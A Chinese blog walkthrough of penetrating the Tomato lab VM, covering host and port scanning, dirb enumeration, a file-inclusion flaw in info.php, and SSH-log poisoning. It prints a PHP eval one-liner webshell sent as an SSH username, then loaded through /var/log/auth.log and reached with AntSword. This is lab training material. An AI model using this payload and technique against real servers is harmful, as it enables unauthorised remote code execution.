当前位置: 首页 > news >正文

文件包含漏洞Tomato靶机渗透_详解

一、导入靶机

将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径

虚拟机设置里修改网络状态为NAT模式

二、信息收集

1、主机发现

用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141

2、端口扫描

用御剑端口扫描扫描全端口

发现21、2211、80、25、1100和8888端口开启

3、访问Web服务

网页上访问192.168.204.141,出现一个大特码头

访问192.168.47.129:8888,弹出一个登录框

4、目录扫描

使用kali的dirb进行目录扫描:dirb http://192.168.204.141/

扫描结果如下

访问antibot_image目录

发现有一个info.php文件

点开发现是一个PHP的探针文件

查看info.php的网页源码,发现存在文件包含漏洞

三、漏洞利用

在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的,所以使用kali命令扫描nmap -A 192.168.204.141 -p-

扫描出来2211,是ssh远程连接端口

此时我们报错连接 2211

ssh '<?php @eval($_POST['cmd']);?>'@192.168.204.141 -p 2211

然后在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

该目录下发现多了一些报错信息,木马大概率写入成功,

使用蚁剑进行连接,上传了一句话木马的路径:

http://192.168.204.141/antibot_image/antibots/info.php?image=/var/log/auth.log

连接密码是刚刚POST传入的:cmd

成功登陆到靶机

http://www.lryc.cn/news/413859.html

相关文章:

  • 湖北汽车工业学院-高等数学考纲
  • Linux:Xshell相关配置及前期准备
  • 模型 正态分布(通俗解读)
  • 安装了Vue-pdf后,打包文件多出了worker.js和worker.js.gz
  • 使用excel生成国际化多语言js文件的脚本
  • 【蝉联】摩斯再次获得“中国隐私计算市场份额第一”
  • 安装 qcloud-python-sts 失败 提示 gbk codecs decode byte 应该如何解决
  • mv:自动对焦代码
  • 【C++】数组案例 五只小猪称体重
  • Bug 解决 | 后端项目无法正常启动,或依赖服务连接失败
  • Linux: network: mlx5_core crash;dos
  • 用手机剪辑视频素材从哪里找?用手机视频素材库分享
  • DataStream API使用Sink及自定义Sink
  • C++标准模板(STL)- 类型支持 (类型属性,检查类型是否拥有强结构相等性,std::has_strong_structural_equality)
  • 《中国数据库前世今生》观影——2000年代/数据库分型及国产数据库开端
  • 图的同态Graph Homomorphism与同构Graph Isomorphism
  • 使用 Python 对雷达卫星 sar 图像进行降噪的三种方法
  • C# Unity 面向对象补全计划 之 初识继承方法与多态
  • 突破PyCharm索引瓶颈:提升文件索引速度的策略
  • 体素相关的快速计算
  • Python 爬虫项目实战(二):爬取微博热搜榜
  • 文件解析漏洞复现
  • git push报错 pre-receive hook declined
  • 打造个性化代码审查工具:在Perl中实现自定义审查的艺术
  • RabbitMq架构原理剖析及应用
  • c# 对接第三方接口实现签名
  • 数学建模评价类模型—层次分析法(无数据情况下)
  • 模拟实现strcat(字符串追加)
  • HTTP简单概述
  • 掌握PyCharm代码片段管理器:提升编码效率的秘诀